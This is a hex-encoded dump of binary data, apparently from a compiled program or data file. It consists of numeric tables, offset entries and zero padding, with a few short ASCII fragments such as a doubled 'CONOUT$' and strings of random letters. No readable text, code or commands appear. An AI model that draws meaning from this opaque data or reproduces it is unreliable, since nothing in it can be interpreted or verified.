3af32c5f394fe125815030158b552b882800498db54e2f8051a123ce80576a1bca51fd8ee28bd5405f7056e836ef941053806df8b0a46e453ba15e1f49d90f9a55014f7a7ec4a87396e26ce9867ead8725021dd76ec0cbfaa97ca7a16d153ad189ac152b0b573efc5040955e8bdcde3a798112d0374ded4e6b1072496237fb83ba8c64c58a49672e5b90bc5f3654f47f16ac3aa973f3978266b0d26878d10e5ff2e086af8d686cf2f2a08742a688c22a138011f75c0705b8b0802353b714ffe4189065d78cd52c6017c0108424d67576a5904e0c7a0efd0c4760a987f6bb39358fc08228fb910b8ba1f190ea2851986992d02c0ac3fe051e10c0f29fecbab5c3bdd0d6e8db6ef16cb7017b5ac09711296d633faf1332cdb5454cc090810a478b204786019b1513c75c414da842ac9fc346d1810573aa1a04f24173f4e5c1b28076b72659419c038563274762ebca3250c147a1fec80a73e7de5728269a91e5f4054172db91645a5ed911ee3abb9ac437b6a0f766f8d591565aa17aa7d160b902873013155b294c604f878861ee8b394f5a705950ffbdc26cf4115ef3ce276ba0f8f7ddeaf0f84888ce917a345ad0f3138337e2c04f624c0405f25aadc860ca7a0857ef3f8ec9855d3f40d7075503ec736d64f7e9f9d420af3da1eca2d3aea79ffa1107bcf8e8f7ded507568ff53258dbcd00083d881e409622e7b581001826b0cdf735e82d5b124cc2676ce52aefd5eca23784a98a4e752ec3e11f91675229da5f2725b13de56a5eb951b23575010c80c8f7fa104db4a55928c7f4e2076ee9e60737b5e420a1deda64909ec6bf9708cab331acc1d96029461ce7ed7be8be556a88a7369a3f8ab3497487232aa036b1855c97484ed92c87da6e60e34b755fa7ea58d7a2b36c0708a3511037cc0dd4c32e6e51c4309ae9773a4bd19158ce628f66704c10c39f9f3a5ee681fe5aef4fd37e6e37034ed849dce59277011c13767b8e7a07fac8eed73a943451342d87f5379f63d04c884b3ec19cdb97e1b1b5cbce1d0ec3d3e00000000000000000000000000004060c0ffffffff1fc0cff7fbfd7ebf3fc02de8fbabb6bd5ec01fd8799ee7797ec08a6e7b0cbc739cc04e3308d4fb21bbc08abf2967b2d3dac03717638c31c6f8c03d8ccbbd3f2e17c1ff2cedb2b4cb32c1d4eabbc0fa2e50c158d0475b9aa06fc1dbb4c732bf6e8ac14b91e4c8f36da9c14c69c6a5e8abc4c1210000000000e0c121fee11ffee1ffc1b50c7e1b353318c2f5d7bd7cddcb37c2e45a38cf16ce53c2b5f5613dd1606fc20b1894ece2c18ac28dc007f52cf0a1c222c9955cc995bcc22541a75f8f0bdac24bb4aee13ab9f1c2f979fb18329c0ec33490988adf8e24c3d82cca97fbd342c3ae70bf5bb61758c37dc871a17cad77c323dbb66ddbb68dc3b9cf44dc45cca4c3cf083bc28eb0c3c323bc8e178c93dac3df2041820409f2c3b4060b686d760ec4c8f1921da2f626c44445b6ed98393fc4ef6a7bd5ed5557c41cdce733358b6ec4b4b8e9e7511186c43aeb505d01879ec47054f35c35cfb5c4f1c8de92027fccc4e659ec2c7616dbc49b86fbe87a42f2c417870e1d3a7408c561ce04eb973321c5246bb5df6ab53fc5c2166ca832b255c581dd090a8f7762c566b8d161b76478c55277ca76a76c97c575c0e26f4616adc525bee55bbee5bbc59fbcd942ad06d6c53d4931832ac5ecc525baa11bbaa1fbc5e6ea23851b6215c61245037c88482ec63da345aa9f133bc6e5ca45bfce8a57c6a5030000000060c6c03f4e8322aa7cc64dcab4f41c9489c691d994e8b0e7a5c6df093f2a4cf8b1c6d9cab7e4b9f2cdc616cb3299b2dbd9c6ea4591135d42f4c6c5e284134e3801c70008c68b28b41ec7eccb28bd8cd22bc705c59de24e7147c795599864b61554c7a31588f7365961c775fa1b5b15637ec7862b527c9b538cc7279ee7799ee799c72b127ebac24fb7c7e2630cc8edabc4c79f0426834b60d2c7270000000000e0c7391e78e08107fec77f3f7efcf8f103c82252150b74c715c8cbf1783c1e8f27c8437d2fbc210d49c8fc2f0ce82a8f5ac8b4b28fddc1316cc8f76cdcf9cdc67dc832cb5c8b19718ec88e189dd038bb90c8521874c3089ca1c879514a29a594b2c8b273bf8435c4c3c883629839570cd3c83675e0f1156be4c84ff18a57bce2f5c8287792e4769204c9f8f074289c1617c95ea949a7807727c9287badd77aad37c90227b9a943f847c9afe22182ed9d57c9ff1058b27dd667c9287fe9977ee977c9257d6637a9ee87c9c6db733b868d97c99ce971beca1da4c95b452a52918ab4c9e11e4a32ee65c5c97f2263768dd9d5c9ab3a9f59dba7e2c939104e38e184f3c9c3d1041d509203cad8f2c568e3bc12ca9a470e2fa4bf2dca684783b8a3413ccaae6bbd817a064fcaff9a5b6a6ea959ca9566efd290fc68cad2b5d9b1e25c7bca5f655d5957d675ca05513b6cd19c84caddb02ec62df496ca6a0000000000a0cac17c395dc362b2cad4e4fbbc4130ccca744eadfea9d5dfca2aed1a08ed1ae8cafa01d5f0c32dfaca2a4551144551f4caa4d791bfed7c07cb063c2a88470511cb7360f062fd9b2ccb51c18aa23f723ecbde6e297be38349cb64e4edf276795bcb754b77dbd2dd56cb58b76251daac61cbbfc84923278d7ccb446fbae9a69b8ecb5906396dfaa399cba5553a320cab94cbf5bcb1253b8aa7cbc422bb079dbeb2cb72a3459b171dcecbb898caf0434bd9cb6e0807789395d4cb2b0000000000e0cb59036bdf5385f3cbc4e8a38f3efa08cc38a80ae7cd611dcc3dab4d5890ce11ccf9b3df3b480c26ccd84cd0df315c3acc6a7c0afab9dd4ecc2b2f8aa2288a42cc1deab2421c8156cc5c1c673430856accb1866eb5f1af7ecc2b2cb9922bb972ccd1ab8c188a2e86cc774fd92d7ee49accc7d2b5c09193aeccfeb953d0e74ea1cc7955f34cd53fb5cc8d0eeb0cbfdec9ccc5e77787b173dccc80af3b61a9c0d0cc895d02b12f6febccaf41e1311814fecc5f62c6eee2c9f2cc57478e1c397204cd749a2f5fefa519cda817cb8be5c512cd9ff07d2c0bdf27cd9f8cadccb6323bcd2e266dd477474ccd7f6b2aaca9b046cd3ac432618eb55bcda18cf6cd68df6ccd9aa1bce329e161cd2ca3389aa2387acd72836f99c2878fcd0a12a639e82381cd1826d7aacfdb9acdce6312f0527caccd8dc5e6efe3cea1cdadb66ddbb66dbbcd643b77802089cccde06326e22e62c6cd1538b282232bd8cd4783daa036a8edcdd9b31dc8f96ce7cde619a76b4b4cf9cd2d3221133221f3cd4f6fdebc79f306ce73f4c743c8181dce4bcc8704d40d13ce82f76449922d29ce229c230fabc93ece66b9fce0dee734ce16c4ab060af14acedc5948951bcd40cea9ed617bd81e56cea18ff1f9189f6fcea33e2e0cd3c765cee4f0bb13333a7bce2d0a9990099970cebb52cd0293fd86ce460a31cb8f689fce3e33ceacdde995ce322a522a4145aacef61c285e1ae8a0ce04f6c7045117b9ce1b6373b98331cece2ed9fd24d9fdc4ce936c2d6402a7ddce0c036dbabf7bd2ce196eefbe292aebce2e0000000000e0cebf9011bf45fcf6ce2ee10eeee00e0ecf9d879649171805cfaf0c7a8d9e191ccf2e71e2d753e214cfa9d0c92788fb2bcf05a4ab63129622cf04e166f33eb839cf4e30ca0d216730cff755b8c90a5147cf8a59c25c5d805fcf98b778628b2756cf5fe32c097d466dcf6b5d083806aa65cfdd8710c618277ccfbb94524a29a574cfdd085291b6e48bcff931b04d2c5583cfc4e96be529df9acfc35558239f2f92cfb9f307d24eb7a9cf3b30e32060c6a1cffaa172da8500b9cf2f1445511445b1cfc3bbc53571fec8cf254441aa24a1c0cfd6c05e8b984cd8cf370c0683c160d0cf084d2b67123ce8cf2f0000000000e0cfbf800103060cf8cf3f0000000000f0cf3f000000000000006c0308560130000043434f4f4e4e4f4f55555454242400000000000000000000ff0000000000c07cbc0000000000c0fcf23178784545787875756a6a4a4a75756e6e797952525656474738384d4d57576e6e454567677878646448486b6b5656777757573737787853537a7a6e6e74745a5a00000000000000000000000000006262636331317171646468686d6d3030737330306d6d67677676303038386161616138386b6b38386a6a39393636646468687a7a7777323233336d6d3737737368683434787830306161737338383737797964640000000000000000000000003333313171717575484876767a7a4a4a6868414134346b6b56564a4a4a4a4e4e6e6e37376161353545455050585873734c4c363671713939737358585050737371716d6d000000000000000000000000303078786464303030303636333334344242323232326161646441414141373737373131424265653535313135353535323237374343333333333030343439396464636366664545363644443030454533334343000000000000000000000000545457574a4a73736363333354547373505035355a5a4343626258587a7a3333414173734a4a50504545616145454d4d76764c4c37377777656544447878545471714a4a000000000000000000000000727268685a5a454577776b6b4545545434345a5a7272777753534848424270707272636361617878343456566868535366667070686865657a7a5959595963636666696900000000000000000000000044444d4d515168686969797957576161383859594e4e656573735656383854547070535343434e4e4242575737375858585859597171656559596969565652526363373700000000000000000000000061616464646472723131717138383838363675756d6d3434747438383939767673737474767632326e6e7474737371716a6a7a7a6e6e3434616173737777747474747171656579796161686866666161353563637575616168683737676776766d6d7a7a7070787832323737777734346363333330306666353573736c6c35353232707074747878353568686e6e6d6d63633939323279793535393965657a7a616177777a7a74746b6b6a6a6767686835356c6c72723232343436363232363673733737737375753535383836360000000000003a56515c610000000d0d0000a4a6020088bd340188ad2401000000003a56515c610000000e0e000000000000000000000000000000000000000000009494000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000505181810100000000000000000000000000000000000078bac280810100008042c28081010000000000000000000000000000000000000001010000000000470417184c101000b017a7002e5a111d0c5049036e000000b007b700202000002e5a111d0c5049034a140030d067b700606202002e5a111d0c505c7800c0c000787a02002e470d05151545113500000078bac200101000002e1e005305016700884ac200080800002e6d1106707c1b02410000009052c200080800002e6d1106707c1b195a000000985ac200080800002e6d1106707c110841000000a062c200181800002e6d1106707c110a43000000b87ac200080800002e6d1106707c11135a000000c002c200080800002e6d1106707c081141000000c80ac200101000002e6d1106707c080858000000d81ac200080800002e6d1106707c080819410000e022c200080800002e6d1106707c080a5a000000e82ac200080800002e6d1106707c0c1541000000f032c200101000002e6d1106707c0c0e5a00000000c3c30088fa72002e5c16051515610088bd3401a8aa02002e5c16051515455e00001e060567000030083901080800002e5c0617476d08004100000038003901080800002e5c0617476d13005a00000040783901080800002e5c0617477015004100000048703901080800002e5c061747700e005a00000050683901707a0a002e561c0515156100c08243015c5c00002e4b0105151561001c5f4201282800002e470d05151545163200000044074201141400002e470d051515451733000000581b4201787a02002e470d051515451034000000d0954401aaaf05002e470d05151545123600000000505101f0f808002e4a051515610000f0a85901d8c911002e4c11007300000000707101ccc00c002e5e14051515610000808101808000002e49010f0d17575c7800000080008101141400002e49010f0d17575d7900000000909101606000002e5c0101114714013100000060f09101808101002e5c010111471402320000000000000000000000000000000000000000000000000000000000000000000000000000000107040206343032112b0e040a7e73070561620620361600bfa916005068390121210404007473070064620620361600bfa91600506839012121000020361600bfa91600506839010105050104464200212e0b040f7b700405313206d0c71700e4f3170098a0390121210000d0c71700e4f3170098a03901212104040074700400343206d0c71700e4f3170098a039010101000011041d0815617d091571630715213206152723f1d01d2d0001010000eff11e007c631f00d067b70000000000111e09060f6b6c080f3b32060f3d397b401d2d00010100001636200034142000e750b7000000000001151c0814706c0814405307142032061426226079131c061a2e3b0f1a6864f6f4646373501d2d000101000099b920004362210003bbb80043622100010704020654505251090901084a420001080801096b6200010b0e040a3e390d0a78747671090c04087a767473636232390d050104262200301d2d00010100001b3c2700a68127003981b800a68127000103030102525000010c09040d393e0a0d7f7456510c09040d393d090d3f34565114100515218eba1514b9b80656500001161f0817637d0917736c08172333071725224051010000011d100c1c7874101c485b0f1c283a0e1c6e6ae8e6f6f4c4c2d2d06071010000000000000106050207069a9b01010000010100000101000001080b02093b37352900130a19fded09196d7c08197d6307192d3206192b27e5c01d2d000202000083b83b00e1da3b0051e9b800201c3c00675c3b00261a3c006cd4b8000000000001121b081327380c13415efcfaeae87877676656511c110c1d697f0b1d796e0a1d495d091d293c081d2f2be9e7f7f5d5c10e0b040f3b32060f3d397b7119120a187c680c184c5f0b182c3e0a184a46e4e2f2f060711310021260795b510a0a010b696200111e0b040f3b32060f3d397b401d2d0001010000155643001f5c4300853db800000000000107040206343052410d160a1c786b0f1c283a0e1c6e6ae8e6f6f4c4c2d2d060401d2d00010100005e1d4300b2f644009f27b80000000000090f040206343032001d2d000101000028614900357c490001010000357c4900010b08020a383436310b0e040a3e32060a38347671080b02099b905251080b02097b7052411e0b040f3b32060f3d397b401d2d0001010000612d4c00713d4c00853db80000000000111e0b040f3b32060f3d397b401d2d000101000019554c002f634c00853db80000000000111e0b040f3b32060f3d397b401d2d0001010000b9f24b00e9a24b00853db80000000000111e0b040f3b32060f3d397b401d2d0001010000a1ed4c00afe34c00853db800000000000104070205717501010b0e040a3e33070a383476711d100c1c78680c1c485f0b1c283e0a1c2e2ae8e6f6f4c4c2d2d060693727091d79a0c41d29f7c31d1cbfbe0eeeec7c7b5b50009021b100e0e505000118130a196d7f0b197d6e0a194d5d09192d3c08194b47f5e11d160a1c2820141caea7e5e3f3f1c1dfcfcd7d7c6c6b5b511c110c1d69790d1d79680c1d495f0b1d293e0a1d4f4be9e7f7f5d5d93c2c0913270d39131231300cfcfaeae8787767665650009021b10070710100111b0e040a3e33070a383476401d2d0001010000e285670040286800bc04b80000000000193c2f0a1642451116222410166460e2e0f0eececc7c7b6bf021b10038380000010704020674703229322c071a6e80f41a2ec7f31a1bf1f00b5b50009021b10070770700010e09060f3b380c0f7d7a7877676656411e0b040f3b32060f3d397b401d2d00010100009dfd6000a6c66000853db80000000000010e09060f6b6f0b0f3b3e0a0f7d797b7118130a196d790d197d680c194d5f0b192d3e0a196b67f5f117040206343032001d2d00010100008ae56f00a1ce6f002891b90000000000011d170b1c6863171c7872161c4841151c2820141c1d131215f5e000010e09060f6b63070f3b32060f3d397b6117040206343032001d2d00010100002e5f710044357100d56db8000000000001060601074542001101170710928efcfadad8c8c676756564343000301d2d0001010000ff8d7200f98a7300eb53b80000000000111e0b040f3b32060f3d397b401d2d00010100006e1f710084f57100853db800000000000118130a196d7b0f197d6a0e194d590d192d380c198b87f5e118130a196d7d09197d6c08194d5307192d3206192b27f5f117040206343072401d2d0001010000a1d97800b7cf78000fb6b90000000000111b0e040a3e32060a383476401d2d0001010000631f7c0079057c000fb6b9000000000001141c091561710515716004154157031521360215f5e00019061a050d0c898806e6e4c4c25250009021b100000404002109220a28dc778320f45084186cf1851074e286083cb387d0ae7e002b547f00f0ce3f0121210000d0ae7e002b547f00f0ce3f010116110617435f0b172521e3e1f1ef7f5134130615d1ce0a0d696d0905313c08007e7e0017697e003c033e0121210000007e7e0017697e003c033e01190a120104a6a2009021b10040400000010b0e040a3e3e0a0a787476693420382a6b60141b7f77131723261213203dbcb8faf8e8e6d6d4c4c25250009021b10050500000010e09060f6b75110f3b24100fddd97b693420584a6b60141b7f77131723261213405dbcb8faf8e8e6d6d4c4c25250009021b1005858000001141d0815617c081571630715213206152723f1e115120614706307142032061426226061041d0815617e0a15716d0915213c08154743e1c01d2d0001010000c8438b0015998c002891b9000000000011051c0814706a0e1420380c146662e0feeeec7c401d2d00020200004ac58f00901f8f0041f8b900000000000d828f009e118f005be2b90000000000111b0e040a3e3c080a585476401d2d000101000022b29000a131900074cdb90000000000010f0c020e3c383a31191e06184c5307182c3206182a2674711e0b040f3b32060f3d397b401d2d0001010000118594006cf89400bc05b90000000000110a110a1b7f680c1b2f3f0b1b2925e7e5f5f3c3c1d1cf7f401d2d000101000032a99b0062f99b008d34b9000000000001161d0a1723231717a5a2e0feeeecdcdacac878776766564931220a1a2e2c181ae8e2e0feeeecdcdacac87877676656c021b10070700000193424091b4fc492192fba8c191a8b880ceeec7c7b6b60009021b1004054140019283a0b1f4bc2941d2ba0961d1e8f8c10e2e0f0eececc7c7b6b60009021b1006074140000000000010b09030a626a0204a6a200111e0b040f3b33070f3d397b401d2d0001010000ae0ba500b81da500a41db9000000000001090a02089a9634293f2f091870660e14151f1e09e9e77776666535345450009021b100d0d000000107040206141032310a08030b636d0507c5c200010505010466620001090901086a6200111e0b040f3b32060f3d397b401d2d0001010000c56ca90005afaa00bc05b9000000000001050501040602000105050104868200011a13081b6f7d091b7f6c081b2f33071b292644590609060f6b6d090f3b3c080f3d397b401d2d000101000042f2b00049f9b000d66fb90049f9b00009030e040a3e32060a383476401d2d00010100001dacb10050e1b10010aaba0050e1b1000103030102323000010505010416120001010000000000000101000000000000000000003a56515c6100000006454201010100000303000003030000e8aa4301f4b6430100434201c0dd1d00405d1d00d0cd1d000d4e4201125142011655420100000101020242016d4a08006c6907071d7472071b6e73071b1f7000581b420100000000000000001254470100c0c00098dd440100000000000000009adc47014082c2000000000000000000000000000000000000000000d095440100000000d89d440100000000e6a3440100000000f4b144010000000002444701000000005a114a01000000004a014a01000000003c774a0100000000a6e0470100000000bafc470100000000d492470100000000e8ae4701000000000443460100000000226546010000000036714601000000004a0d460100000000662146010000000080c746010000000096d1460100000000aceb460100000000c681460100000000dc9b460100000000f0b7460100000000024a490100000000165e490100000000246c4901000000003c744901000000004c044901000000005c14490100000000743c4901000000008cc4490100000000a4ec490100000000cc84490100000000d890490100000000e6ae490100000000f4bc490100000000feb64901000000000c454801000000001e5748010000000030794801000000003e77480100000000541d4801000000006a2348010000000080c948010000000096df480100000000a2eb480100000000aee7480100000000bef7480100000000ca83480100000000de97480100000000eea7480100000000004a4b01000000000a404b0100000000165c4b010000000022684b0100000000347e4b0100000000460c4b0100000000602a4b01000000007a304b01000000008cc64b01000000009cd64b0100000000aae04b0100000000bcf64b0100000000c8824b0100000000d69c4b0100000000e6ac4b0100000000f2b84b0100000000064d4a0100000000165d4a010000000028634a010000000068234a01000000000000000000000000783e470100000000662047010000000052144701000000003e7847010000000020664701000000008acc4701000000000000000000000000c0c4573f09001570bbb9452b030d030d2d2d00030c63c2c0452b030d030d2a3417006500c6c4452b030d030d20230c086b00cdcf452b030d030d393b02030c086b004b0e171c0b097f011c4a08006c00cecf483a302f0519120d0e131622291d1f0c1535371708050d030e0965008c8e513611372f0519120d0e13162025151561001819462211372f0519120d0e1316202515156100d5d545281d040d3a2f0519120d0e131664004949432f031c16262f0519120d0e131664002a284d3f150b2d2f0519120d0e1316645506161761011c4a08006c00181c5626182f221104010717262c011a111d0c741f1b562618202300041e0536331b0d171d06012b2b1a060b790026225626183a3f1b0601140d393b191e070a6400e2e6513b06090f0a080901213d1b0615041d0601282f051811177200b3b7573611213b06090f0a080901213d1b0615041d0601282f0518111772c6c746221137360700170b1a24221d0c06160073ceca5031171f04070f151135221d0c061600730006054a3a23221d0c0616001c1d3423041501071735221716160b1a74a9aa522410170b29351714091d1f0c0f0d06262c1a1b1a111772c7c646221137360700170b1a24221d0c0616003a2d64cbca46221137360700170b1a203c1a1704052d2d64008082452211272a0a071108393d04082432352f0509313d040865efed4b27071d1d080d05131f361f251a073c2d04056402014a3a372107171200021722221716160b1a746a68452211272715130601053927080938571e1c45221139220b1119092d290f0a08093257002521562618393b191e070a213d78f1f34b271a11171e030c080e01222a19061b3b1f251a0774080a452211382d12073137001d1d72008084573611382d12073137001d1d7200f2f2452b1a111731311b1d1d0a020d3f3606171d06016e003b384f2904171326311b1d1d0a020d3f3606171d06016e00d2d244210909111126311b1d1d0a020d3f3606171d06016eebe94b27071d1d080d05131f26311b1d1d0a020d3f3606171d06012f2f0a372319072d2c1a1b1a74d3d750381f322d00030c6300d5d150381f34221122370d191065d6d250381f20361122370d191065d4d050381f353417006568694734170029250b1013130b794c4e45221124221d0c22250016171600730040434f230e0528250b1013130b3c3d2f57001f1e443d111d24221d0c061600731d1f45221139220b1119092d290f0a0809203d2f5700191b45221139220b111909232f05092b2f0c08244100696a4e3819181d2b3b0d11313b383e0d01262b0913722025523e0d01262b0913263b223819181d2b3b0d1165d7d54a2d0411363417006500d3d14a2d0411312d00030c632f2c4f0f0e2c112327061b07093057003435472f070a272f031c16653938472f070a222f1b0107322f0509203d3941004948472f070a2a2b1d0c322f050924410c0f4a3a25370d050d272c0b0135310602656e6f46221135021350003e3c4522113b0a080e13500078794622113713192708096f8c8d462211372c02000c0f0a2825070b24418d8c462211372c02000c0f0a2825070b3257e1e0462211312b181f1b1d0103080b1a2727061b070914245700676647341700202b181f1b1d0103080b1a2727061b0709142457515345221124221d0c0616003b2d041170006b694522112727102c290f0a08096500fafb462211322f0509312d09156570724522112727061b0709332d0915325700dcde4a2d0411233a131f6500dad84a2d04112237242d00030c6394905736112727102c290f0a08096500343152251b1d11232f0509655d5c472a19061b2e2f0509273713000317017300a0a1462211372c011d1c030926135000b2b3462211372c011d1c030928220b0165007571573611322f0509353f06071a1117373d78005252432f031c162d290f0a080965333652251b1d11262c011d1c030932578f8f433117041511232f05093257b4b75133081a16203d1b0615041d06016e00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000032907df2b4b22b00cd907df2b4b22b0000000000ff00000001010000020200002f0f2000000000000000000000000000ff000000fd020000ff000000f30c00000808000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000001000000000002000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000610301070103010f010301070103011f010301070103010f01037a0000000000410301070103010f010301070103011f010301070103010f01035a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000050005181810100000103060c080000000000000000000000a4a7030060e2fbfba321000000000000a679df0000000000a104a50000000000811e7f1cfc000000403efe7cfc000000a8ab0300c1627979832000000000000000000000000000000000000000000000817ffe000000000040befe0000000000b5b60300c1627979832000000000000000000000000000000000000000000000817ffe000000000041bffe0000000000b6b50300cf6d4646b81ae5474a4af95b00000000000000000000000000000000817ffe0000000000403edf5ffe00000051540500518b8484fa205f85b0b0e8320000000000000000000000000000000081520b063e19f900314fff7ffe00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000001000000000002000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000610301070103010f010301070103011f010301070103010f01037a0000000000410301070103010f010301070103011f010301070103010f01035a000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000e03ede808101000001010000000000000101000000000000000000000101000000000000000000000000000000000000000000000000000000000000000000000000000000000000f8ae578181010000000000000000000000000000000000000000000000000000f8ae578181010000000000000000000000000000000000000000000000000000f8ae578181010000000000000000000000000000000000000000000000000000f8ae578181010000000000000000000000000000000000000000000000000000f8ae578181010000000000000000000000000000000000000000000000000000000000000000000000000000000000001048598181010000000000000000000000000000000000006081e18081010000e002e2808101000060b7d7808101000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000090c554818101000050005181810100004343000000000000000000000000000000000000000000000000000001212000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000022220000101000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000222200002020000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000fe010000ff000000a8f05981810100008ce66b81810100008ce66b81810100008ce66b81810100008ce66b81810100008ce66b81810100008ce66b81810100008ce66b81810100008ce66b81810100008ce66b81810100007f00000000000000d3f459818101000090fa6b818101000090fa6b818101000090fa6b818101000090fa6b818101000090fa6b818101000090fa6b818101000090fa6b81810100002e2e00002e2e0000fe01000000000000ff000000000000000101000000000000000000000000000075ed9800000000000000000000000000f4f50100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000020361600bfa9160050683901bfa916006f781700586039016f7817008a9d1700704839018a9d1700d0c7170088b03901d0c71700e4f3170098a03901e4f317003f231c00a09839013f231c00465a1c00b8803901465a1c0035281d00c8f03901405d1d00b8a51d0050683901d0cd1d0016081e0098a03901405e1e00617f1e00e0d83901647a1e00b4aa1e0098a03901b4aa1e00dfc01f00e4dc3901e0ff1f00624220001029380164442000597821004c7538015c7d2100b091210038013801b0912100edcc2100dce13c01f0d12100240622005068390124062200f5d7220084bd3801f8da22000b28230098a039010c2f2300a78423007c453801a88b2300153124008cb53801183c240089ad240098a138018ca82400c5e1240098a03901c8ec2400fcd8240098a03901fcd824001134250098a03901143125003c19250098a039013c1925005174250098a0390154712500b590250038013801b89d2500e8cd250098a03901e8cd2500fcd9250098a03901fcd925004563260050683901486e260011362700ccf5380114332700ad8a2700a49d3801b0972700d4f3270050683901d4f32700ffd8270050683901002828004f6728005068390150782800674f280098a0390168402800143d2900d8e13801406929005b72290098a039016c452900b19b2a00e4dd3801b49e2a00fed42a00dce13c01002b2b004a612b00dce13c01547f2b001a372d00f4cd3801301d2d002b042f000c363b012c032f005e712f0098a03901604f2f00745b2f0098a03901745b2f0086a92f0098a0390188a72f00a8872f0098a03901a8872f00b8972f0098a03901b8972f00e2cd2f005068390100303000a091310028123b01b0813100d4e53100300a3b01e0d13100f8c9310038023b0100323200013332003c063b011022320011233200407a3b01182a32003705320098a03901380a320085b732005068390188ba320040733300dce13c01407333007f4c330098a0390180b33300a291330098a03901a4973300ead9330050683901ecdf3300231734005068390124103400ecd9350034083d01ecd9350040763600744f3a014076360094a23600744f3a0194a23600e8de3600744f3a01e8de36004f783700dce13c0150673700c7f0370038013801142c3800526a3800447e3b0178403800eed638007c423f01f0c838003c053900dce13c0150693900dde73a0038013801ecd63a0058643c004c763b0158643c00a19d3c0050683901a4983c00102d3d00744f3a013c013d00f8c63e00a09a3b01f8c63e0059663f00506839015c633f00d29240008cb63b01d494400040014100744f3a0140014100397b4200c8f23b013c7e42007d3f4200bc863b0180c242009ad8420098a039019cde4200b6f4420098a03901b8fa4200f0b2420098a03901f8ba420033704300f0ca3b0134774300d39744001c273a01d4904400aee84600a09a3b01c0864600fabc4600e8d23b013c7b470084c34700e0da3b0198df4700bbfc470098a03901bcfb4700cc8b470098a03901cc8b47001d5548005068390128604800b6fe480050683901cc844800e0a8480098a03901e0a84800f0b8480098a03901044d4900145d490098a03901145d49003b7249004c773a013c754900793049006c573a017c354900da93490050683901dc9549003b714a00506839013c764a0091db4a0098a0390194de4a0009424b00506839010c474b009cd74b00744f3a019cd74b00fbb04b00d8e33a01fcb74b00410d4c00b48f3a0144084c0083cf4c0090ab3a0184c84c00c18d4c00fcc73a01c4884c0091dc4d0080bb3a0194d94d00b4f94d006c573a01b4f94d00a9e74e0088b33a01ace24e00135c4f00744f3a01145b4f00551a4f005068390158174f00eca34f00744f3a01eca34f008bdb5000dce13c018cdc5000c595500098a03901c8985000eaba500098a03901ecbc500034655100506839015001510087d6510050683901a4f551004417530034083d014417530099ca5300744f3a019ccf5300f1a25300744f3a01f4a75300491d5400744f3a014c185400b4e05400dce13c01b4e054002c795500380138012c7955001b4d5600645a3f011c4a560081d75600dce13c0184d25600bbed5600201c3d01bcea56004116570028143d014413570085d257005068390188df5700e3bb5800506c3d01ecb4580093ca5900704c3d0194cd5900b2eb5900fcbd4001b4ed5900faa3590098a03901441e5a0092c85a00744f3a0194ce5a00b4ee5a0098a03901b4ee5a00d48e5a0098a03901e8b25a00f1ad5c0088b43d01f4a85c00045a5e00a09c3d01045a5e00b0ef5f00bc803d01b0ef5f00771760003801380180e06000b8d8600054693c01b8d86000cfad6200dce13c01d0b262004d2e6300201d3c0150336300e083630038013801e0836300c2a7650028153c01c4a16500791e670044793c017c1b6700a3c4670098a03901a4c36700630b6800dce03d01640c68000b606b00003d3c010c676b0081ea6b0078453c0198f36b00bdd66b0098a03901c4af6b00c7ab6c0088b53c01d0bc6c0065086d003801380168056d0084e96d0098a0390190fd6d007b156e00c0fd3c017c126e0077186f00f4cb3e0178176f00b3dc6f00a09d3c01b4db6f00f49b6f00744f3a01f49b6f0088f870003801380188f87000d7a77000dce13c01e090700020517100744f3a012051710054257100ecd13c015425710099e87100407e3f019ced7100cabb71000c323f01ec9d710085f17400142a3f01b0c47400f5817400744f3a0100757500483e7600645a3f015026760081f776005068390184f27600b5c3760050683901b8ce7600dea8760098a03901e0967600ff8877007c423f01007878005b2378005068390180f87800c7bf780094aa3f01c8b07800f78f780098a0390184fd7900fa807a0038013801245f7b005a217b006c573a0184ff7b002c507c0098a039012c507c009ce07c00b48a3f019ce07c0004797d00744f3a0104797d00cbb67d00d8e63f01ccb17d00fe837d0098a03901007e7e0017697e003c033e0117697e00cbb57e004c733e01cbb57e00ccb27e0068573e01d0ae7e002b547f00f0ce3f012b547f00e766810008373e01e7668100048682002c133e0104868200d6548200744f3a01d85a820076f5830078473e01800383001692840088b73e01189c84002fab840098a0390130b48400e164850094ab3e01e46185003fb68900ccf33e0140c98900d65f8900bc833e01d8518900119b8a0098a03901149e8a00961c8a00744f3a0198128a002da68b003801380130bb8b00800b8b0008484101800b8b0037bb8c0018584101800c8c003ab78d00f4c